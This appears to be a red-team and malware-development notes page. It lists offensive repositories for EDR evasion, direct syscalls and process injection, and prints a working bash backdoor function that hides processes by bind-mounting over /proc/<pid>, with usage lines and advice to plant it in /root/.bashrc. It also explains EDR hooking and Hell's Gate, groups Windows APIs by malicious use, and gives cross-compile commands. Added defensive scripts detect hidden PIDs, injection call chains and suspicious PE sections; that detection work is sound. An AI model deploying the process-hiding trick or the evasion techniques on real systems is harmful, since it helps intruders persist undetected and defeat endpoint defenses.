- Bash Backdoor
- Endpoint Protection & Response (EDR)
- Microsoft Windows API
- PE Files
- x86_64-w64-mingw32-g++
- x86_64-w64-mingw32-gcc
- xxd
Name | Description | URL |
---|---|---|
AmsiScanBufferBypass | Bypass AMSI by patching AmsiScanBuffer | https://github.com/rasta-mouse/AmsiScanBufferBypass |
ASM HalosGate Direct System Caller | x64 Assembly HalosGate direct System Caller to evade EDR UserLand hooks | https://github.com/boku7/AsmHalosGate |
BouncyGate | HellsGate in Nim, but making sure that all syscalls go through NTDLL.DLL (as in RecycledGate). | https://github.com/eversinc33/BouncyGate |
FreshyCalls: Syscalls Freshly Squeezed! | FreshyCalls tries to make the use of syscalls comfortable and simple, without generating too much boilerplate and in modern C++17! | https://github.com/crummie5/FreshyCalls |
GoRedOps | 🦫 GoRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team, with a specific focus on the Go programming language, all is made for educational purposes only. | https://github.com/EvilBytecode/GoRedOps |
Hell's Gate | Original C Implementation of the Hell's Gate VX Technique | https://github.com/am0nsec/HellsGate |
HellsHall - Another Way To Fetch Clean Syscalls | Performing Indirect Clean Syscalls | https://github.com/Maldev-Academy/HellHall |
Linux syscall tables | n/a | https://syscalls.mebeim.net/?table=x86/64/x64/v6.2 |
litcrypt | The name is an abbreviation of ‘Literal Encryption’ – a Rust compiler plugin to encrypt text literals using the XOR cipher. | https://docs.rs/litcrypt/latest/litcrypt |
Maldev | Golang library for malware development and red teamers | https://github.com/D3Ext/maldev |
Microsoft Windows System Call Table (XP/2003/Vista/2008/7/2012/8/10) | n/a | https://j00ru.vexillium.org/syscalls/nt/64/?s=09 |
MutationGate | Use hardware breakpoint to dynamically change SSN in run-time | https://github.com/senzee1984/MutationGate |
NimHollow | Nim implementation of Process Hollowing using syscalls (PoC) | https://github.com/xdavidel/NimHollow |
NimlineWhisperer2 | A tool for converting SysWhispers2 syscalls for use with Nim projects | https://github.com/ajpc500/NimlineWhispers2 |
nim-strenc | A tiny library to automatically encrypt string literals in Nim code | https://github.com/Yardanico/nim-strenc |
OffensiveCpp | This repo contains C/C++ snippets that can be handy in specific offensive scenarios. | https://github.com/lsecqt/OffensiveCpp |
Offensive-C-Sharp | I wrote these while learning AD Pentesting and windows hacking | https://github.com/winsecurity/Offensive-C-Sharp |
OffensiveCSharp | Collection of Offensive C# Tooling | https://github.com/matterpreter/OffensiveCSharp |
OffensiveGo | Golang weaponization for red teamers. | https://github.com/Enelg52/OffensiveGo |
OffensiveLua | Offensive Lua is a collection of offensive security scripts written in Lua with FFI. | https://github.com/hackerhouse-opensource/OffensiveLua |
OffensiveNim | Experiments in weaponizing Nim for implant development and general offensive operations. | https://github.com/0xsyr0/OffensiveNim |
OffensiveRust | Rust Weaponization for Red Team Engagements. | https://github.com/trickster0/OffensiveRust |
ParallelSyscalls | Companion code to the "EDR Parallel-asis through Analysis" found: https://www.mdsec.co.uk/2022/01/edr-parallel-asis-through-analysis | https://github.com/mdsecactivebreach/ParallelSyscalls |
PoolParty | A set of fully-undetectable process injection techniques abusing Windows Thread Pools | https://github.com/SafeBreach-Labs/PoolParty |
RecycledGate | Hellsgate + Halosgate/Tartarosgate. Ensures that all systemcalls go through ntdll.dll | https://github.com/thefLink/RecycledGate |
RustRedOps | 🦀 RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team, with a specific focus on the Rust programming language. (In Construction) | https://github.com/joaoviictorti/RustRedOps |
Ruy-Lopez | This repository contains the Proof-of-Concept(PoC) for a new approach to completely prevent DLLs from being loaded into a newly spawned process. | https://github.com/S3cur3Th1sSh1t/Ruy-Lopez |
SysWhispers | AV/EDR evasion via direct system calls. | https://github.com/jthuraisamy/SysWhispers |
SysWhispers2 | AV/EDR evasion via direct system calls. | https://github.com/jthuraisamy/SysWhispers2 |
SysWhispers3 | SysWhispers on Steroids - AV/EDR evasion via direct system calls. | https://github.com/klezVirus/SysWhispers3 |
Tartarus' Gate - Bypassing EDRs | TartarusGate, Bypassing EDRs | https://github.com/trickster0/TartarusGate |
Tartarus-TpAllocInject | This is a simple loader that was published along with the blog post for Nettitude Labs on "Creating an OPSEC safe loader for Red Team Operations". | https://github.com/nettitude/Tartarus-TpAllocInject |
Win32 Offensive Cheatsheet | Win32 and Kernel abusing techniques for pentesters | https://github.com/matthieu-hackwitharts/Win32_Offensive_Cheatsheet |
Windows API Function Cheatsheets | A reference of Windows API function calls, including functions for file operations, process management, memory management, thread management, dynamic-link library (DLL) management, synchronization, interprocess communication, Unicode string manipulation, error handling, Winsock networking operations, and registry operations. | https://github.com/7etsuo/windows-api-function-cheatsheets |
This is an old Linux trick executed in Bash that simply over-mounts a particular PID in /proc with a useless, empty directory, so that /proc/<PID> doesn't get populated with the usual process information (invisible to the ps command, for example). Requires root permissions; either execute it in your shell or slap it into /root/.bashrc.

Thanks to Alh4zr3d and THC for sharing!
```bash
hide()
{
    # If /etc/mtab is a symlink (to /proc/self/mounts), replace it with a static copy so the
    # bind mount below is not listed there; `mount -n` additionally skips updating /etc/mtab.
    [[ -L /etc/mtab ]] && { cp /etc/mtab /etc/mtab.bak; mv /etc/mtab.bak /etc/mtab; }
    _pid=${1:-$$}
    # Numeric argument (or no argument at all): over-mount /proc/<pid> of an existing process.
    [[ $_pid =~ ^[0-9]+$ ]] && { mount -n --bind /dev/shm /proc/$_pid && echo "[Backdoor] PID $_pid is now hidden"; return; }
    # Otherwise the arguments are a command line: single-quote every argument for the nested shell.
    local _argstr
    for _x in "${@:2}"; do _argstr+=" '${_x//\'/\'\"\'\"\'}'"; done
    # Background invocation (no '+' in the process state): replace this shell instead of forking.
    [[ $(bash -c "ps -o stat= -p \$\$") =~ \+ ]] || exec bash -c "mount -n --bind /dev/shm /proc/\$\$; exec \"$1\" $_argstr"
    # Foreground invocation: start a child shell that hides its own PID and then execs the command.
    bash -c "mount -n --bind /dev/shm /proc/\$\$; exec \"$1\" $_argstr"
}
```
- Hide the current shell/PID: `hide`
- Hide the process with PID 31337: `hide 31337`
- Hide `sleep 1234`: `hide sleep 1234`
- Start and hide `sleep 1234` as a background process: `hide nohup sleep 1234 &>/dev/null &`
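A defender-side check for the trick above, written as an added example (it is not part of the original page and not THC's code): the kernel still records the bind mount in /proc/self/mountinfo even when `mount -n` and a static /etc/mtab keep it out of the mount table userland usually reads, so listing every mount placed directly on /proc/<pid> exposes the hidden process. The mountinfo sample lines below are constructed; the live check reads the real file.

```python
import re
from pathlib import Path

# Constructed sample of /proc/self/mountinfo (not captured from a real host): the normal
# /proc mount, a legitimate sub-mount, and one bind mount of a tmpfs over /proc/31337.
SAMPLE_MOUNTINFO = """\
22 28 0:21 / /proc rw,nosuid,nodev,noexec,relatime shared:12 - proc proc rw
23 22 0:24 / /proc/sys/fs/binfmt_misc rw,relatime shared:13 - autofs systemd-1 rw,fd=30
40 22 0:25 / /proc/31337 rw,nosuid,nodev shared:20 - tmpfs tmpfs rw
"""

# Only mounts sitting directly on a PID directory are interesting; /proc/sys/... is normal.
PID_MOUNT_RE = re.compile(r"^/proc/(\d+)$")


def unescape(field: str) -> str:
    """mountinfo encodes space, tab, newline and backslash as octal escapes (\\040 etc.)."""
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), field)


def parse_mountinfo(text: str):
    """Yield (mount_point, fstype, source) per line.
    Layout: id parent major:minor root mount_point options [optional...] - fstype source superopts
    The optional fields are variable-length, so the separator '-' is located explicitly."""
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(" ")
        sep = fields.index("-")
        yield unescape(fields[4]), fields[sep + 1], unescape(fields[sep + 2])


def find_hidden_pids(text: str) -> dict:
    """Return {pid: (fstype, source)} for every mount placed directly over /proc/<pid>.
    Nothing legitimate mounts there, so any hit deserves an incident ticket."""
    hidden = {}
    for mount_point, fstype, source in parse_mountinfo(text):
        m = PID_MOUNT_RE.match(mount_point)
        if m:
            hidden[int(m.group(1))] = (fstype, source)
    return hidden


def check_live_system() -> dict:
    """Same check against this mount namespace. Unlike /etc/mtab, /proc/self/mountinfo
    is maintained by the kernel and cannot be skipped with `mount -n`."""
    return find_hidden_pids(Path("/proc/self/mountinfo").read_text())


if __name__ == "__main__":
    for pid, (fstype, source) in find_hidden_pids(SAMPLE_MOUNTINFO).items():
        print(f"[!] /proc/{pid} is over-mounted ({fstype} from {source})")
```

Two caveats when running this on a live host: the check must run in the same mount namespace as the hidden process (a container or `unshare -m` has its own mountinfo), and a complementary signal is a numeric /proc entry whose `stat` file cannot be read, which is exactly what makes `ps` skip the process.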
```
Kernel
  ^ (Syscall)
  |
ntdll.dll                   < Monitored by EDR
  ^ (NtAllocateVirtualMemoryEx)
  |
Win32 API (System32 DLLs)
  ^ (VirtualAllocEx)
  |
Written Code
```
In short, the EDR overwrites the start of the syscall stub in ntdll.dll, replacing the instruction that issues the syscall with a jump into the EDR's hook code, so every call is inspected before it reaches the kernel.

The Hell's Gate technique therefore requires reading ntdll.dll from disk, because the copy of ntdll.dll mapped in memory is hooked by the EDR.
- GetAsyncKeyState
- GetKeyState
- SetWindowsHookExA
- WSAStartup
- WSASocket
- WSACleanup
- socket
- bind
- WSAIoctl
- ioctlsocket
- URLDownloadToFile
- ShellExecute
- WinExec
- InternetOpen
- InternetConnect
- HttpOpenRequest
- HttpAddRequestHeaders
- HttpSendRequest
- InternetReadFile
- FindResource
- LoadResource
- SizeOfResource
- LockResource
- LoadLibraryA
- GetProcAddress
- GetWindowThreadProcessId
- SetWindowsHookEx
- BroadcastSystemMessage
- GetMessage
- DispatchMessage
- OpenProcess
- VirtualAllocEx
- WriteProcessMemory
- GetModuleHandle
- GetProcAddress
- CreateRemoteThread
- LoadLibraryA
- GetProcAddress
- VirtualProtect
- ReadProcessMemory
- CreateProcessA
- NtUnmapViewOfSection
- VirtualAllocEx
- WriteProcessMemory
- GetTickCount
- CountClipboardFormats
- GetForegroundWindow
- IsDebuggerPresent
- CreateToolhelp32Snapshot
- CheckRemoteDebuggerPresent
- NtQueryInformationProcess
- ZwQueryInformationProcess
- NtSetInformationThread
- ZwSetInformationThread
- NtQueryObject
- OutputDebugString
- EventPairHandles
- CsrGetProcessID
- CloseHandle
- NtClose
- IsDebugged Flag
- Heap Flag
- FindFirstStreamW
- FindNextStreamW
- CryptCreateHash
- CryptEncrypt
- CryptDecrypt
- CryptGenKey
- CryptDeriveKey
- CryptAcquireContext
The ALG_ID argument indicates the algorithm used (values of the form 0x000066xx).
- RtlCompressBuffer
- RtlDecompressBuffer
- CryptAcquireContext
- CryptCreateHash
- BCryptCreateHash
- CryptEncrypt/Decrypt
- Process32First
- FindWindowA
- RegSetValueEx
- CreateThread
- GetEIP
- GetFileSize
- malloc
- free
- GetTempPathA
- WinExec
- GetModuleHandleA
- ResumeThread
- NtAllocateVirtualMemory
- NtOpenProcess
- ZwWriteVirtualMemory
- ZwResumeThread
- NtOpenEvent
- NtCreateEvent
- NtCreateUserProcess
- AdjustTokenPrivileges
- CreateFileMapping
- CreateMutex
- FindResource
- GetModuleFileName
- LdrLoadDll
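The API groupings above are most useful as ordered chains rather than as single names: OpenProcess followed by VirtualAllocEx, WriteProcessMemory and CreateRemoteThread in one process is a far stronger signal than any one of those calls alone. The following is an added detection example (not code from the original page) that matches such chains against a per-process call trace of the kind an EDR or sandbox emits. The chain definitions use the API names listed above; the `pid api` trace format and the sample trace are constructed for the example.

```python
from collections import defaultdict

# Ordered chains built from the groupings above. A chain matches when every call occurs in
# the given order; unrelated calls may be interleaved (subsequence match, not contiguous).
CHAINS = {
    "remote thread injection": ["OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"],
    "process hollowing": ["CreateProcessA", "NtUnmapViewOfSection", "VirtualAllocEx",
                          "WriteProcessMemory", "ResumeThread"],
    "wininet downloader": ["InternetOpen", "InternetConnect", "HttpOpenRequest",
                           "HttpSendRequest", "InternetReadFile"],
    "download and execute": ["URLDownloadToFile", "WinExec"],
}

# Constructed trace (assumed "pid api" format, not from any real sandbox). PID 4242 performs
# a remote thread injection with unrelated calls interleaved; PID 5151 touches the same APIs
# but in an order that cannot be an injection (OpenProcess comes last).
SAMPLE_TRACE = """\
4242 GetModuleHandle
4242 OpenProcess
4242 GetTickCount
4242 VirtualAllocEx
4242 WriteProcessMemory
4242 CloseHandle
4242 CreateRemoteThread
5151 VirtualAllocEx
5151 WriteProcessMemory
5151 OpenProcess
"""


def parse_trace(text):
    """Group the trace into {pid: [api, api, ...]} preserving call order."""
    calls = defaultdict(list)
    for line in text.splitlines():
        if line.strip():
            pid, api = line.split(None, 1)
            calls[int(pid)].append(api.strip())
    return calls


def is_subsequence(chain, calls):
    """True if every API in `chain` appears in `calls` in that order.
    The shared iterator makes each step resume scanning after the previous match."""
    it = iter(calls)
    return all(any(call == step for call in it) for step in chain)


def match_chains(calls_by_pid, chains=CHAINS):
    """Return {pid: [chain names matched]} for processes whose trace contains a full chain."""
    hits = {}
    for pid, calls in calls_by_pid.items():
        matched = [name for name, chain in chains.items() if is_subsequence(chain, calls)]
        if matched:
            hits[pid] = matched
    return hits


if __name__ == "__main__":
    for pid, names in match_chains(parse_trace(SAMPLE_TRACE)).items():
        print(f"[!] PID {pid}: {', '.join(names)}")
```

Order-aware matching is what keeps the false-positive rate acceptable: debuggers, installers and backup agents call VirtualAllocEx and WriteProcessMemory routinely, but rarely in the complete injection order. In production the chains would also carry the target handle so that a write into a foreign process is distinguished from a write into the process's own address space.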
- .text: This section generally contains the CPU instructions executed when the PE file is run. This section is marked as executable.
- .data: This section contains the global variables and other global data used by the PE file.
- .rsrc: This section contains resources that are used by the PE file, for example, images, icons, etc.
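To see those section properties in practice, here is an added example (not from the original page) that parses the PE section table and triages it the way a first-pass analysis tool does: it verifies that .text is marked executable, and flags sections that are both writable and executable or that occupy memory without any bytes on disk, both typical of packed samples. Because no real binary ships with the page, the code constructs a minimal PE image inline; that image is an assumption for the example and is not loadable.

```python
import struct

# IMAGE_SECTION_HEADER.Characteristics bits (from winnt.h)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# IMAGE_SECTION_HEADER: Name[8], VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# PointerToRelocations, PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers,
# Characteristics (40 bytes, little-endian)
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")
FILE_ALIGN = 0x200


def build_sample_pe(sections):
    """Construct a minimal PE image for the example: MZ stub, PE signature, COFF header,
    a short optional header, the section table and the raw section bytes (constructed,
    not a real or loadable binary)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_hdr = struct.pack("<H", 0x20B) + b"\0" * 14            # PE32+ magic, rest zeroed
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, len(opt_hdr), 0x22)
    table_end = e_lfanew + 4 + len(coff) + len(opt_hdr) + SECTION_HDR.size * len(sections)
    raw_off = (table_end + FILE_ALIGN - 1) & ~(FILE_ALIGN - 1)
    headers, blobs, va = b"", b"", 0x1000
    for name, data, virt_size, chars in sections:
        headers += SECTION_HDR.pack(name.encode().ljust(8, b"\0"), virt_size, va,
                                    len(data), raw_off if data else 0, 0, 0, 0, 0, chars)
        blobs += data
        raw_off += len(data)
        va += max(virt_size, 0x1000)
    image = dos + b"PE\0\0" + coff + opt_hdr + headers
    return image.ljust((table_end + FILE_ALIGN - 1) & ~(FILE_ALIGN - 1), b"\0") + blobs


def parse_sections(image):
    """Walk DOS header -> e_lfanew -> PE signature -> COFF header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size                           # 4 (signature) + 20 (COFF) + optional
    sections = []
    for i in range(num_sections):
        name, vsize, va, rsize, roff, _, _, _, _, chars = SECTION_HDR.unpack_from(
            image, table + i * SECTION_HDR.size)
        sections.append({"name": name.rstrip(b"\0").decode(errors="replace"),
                         "virtual_size": vsize, "virtual_address": va,
                         "raw_size": rsize, "raw_offset": roff, "characteristics": chars})
    return sections


def perms(chars):
    """Render the MEM_* bits as R/W/X, the way most PE triage tools print them."""
    return "".join(f if chars & b else "-" for f, b in
                   (("R", IMAGE_SCN_MEM_READ), ("W", IMAGE_SCN_MEM_WRITE), ("X", IMAGE_SCN_MEM_EXECUTE)))


def triage(sections, file_size):
    """Return (section name, finding) pairs for layouts that deserve a closer look."""
    findings = []
    for s in sections:
        c = s["characteristics"]
        if c & IMAGE_SCN_MEM_WRITE and c & IMAGE_SCN_MEM_EXECUTE:
            findings.append((s["name"], "writable and executable (RWX)"))
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            findings.append((s["name"], "no bytes on disk but reserved in memory (unpacking target)"))
        if s["raw_offset"] + s["raw_size"] > file_size:
            findings.append((s["name"], "raw data runs past end of file"))
        if s["name"] == ".text" and not c & IMAGE_SCN_MEM_EXECUTE:
            findings.append((s["name"], ".text is not marked executable"))
    return findings


# Constructed sample: the three sections described above plus one typical of a packer stub.
SAMPLE_PE = build_sample_pe([
    (".text", b"\xC3" * 64, 64, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".data", b"\0" * 32, 32, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".rsrc", b"\0" * 16, 16, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (".stub", b"", 0x8000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])

if __name__ == "__main__":
    secs = parse_sections(SAMPLE_PE)
    for s in secs:
        print(f"{s['name']:<8} {perms(s['characteristics'])} va=0x{s['virtual_address']:x} "
              f"raw=0x{s['raw_offset']:x}+0x{s['raw_size']:x}")
    for name, why in triage(secs, len(SAMPLE_PE)):
        print(f"[!] {name}: {why}")
```

Pointing `parse_sections` at the bytes of a real file (for instance one produced by the mingw commands below) works unchanged, since the only fields it relies on are e_lfanew, NumberOfSections and SizeOfOptionalHeader; the section names are cosmetic and a compiler or packer can choose any, which is why the triage keys on the characteristics bits rather than on the name alone.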
```shell
$ x86_64-w64-mingw32-g++ -O2 <FILE>.cpp -o <FILE>.exe -mconsole -I /usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive >/dev/null 2>&1
$ x86_64-w64-mingw32-gcc <FILE>.c -o <FILE>.exe
$ xxd -i <FILE>
```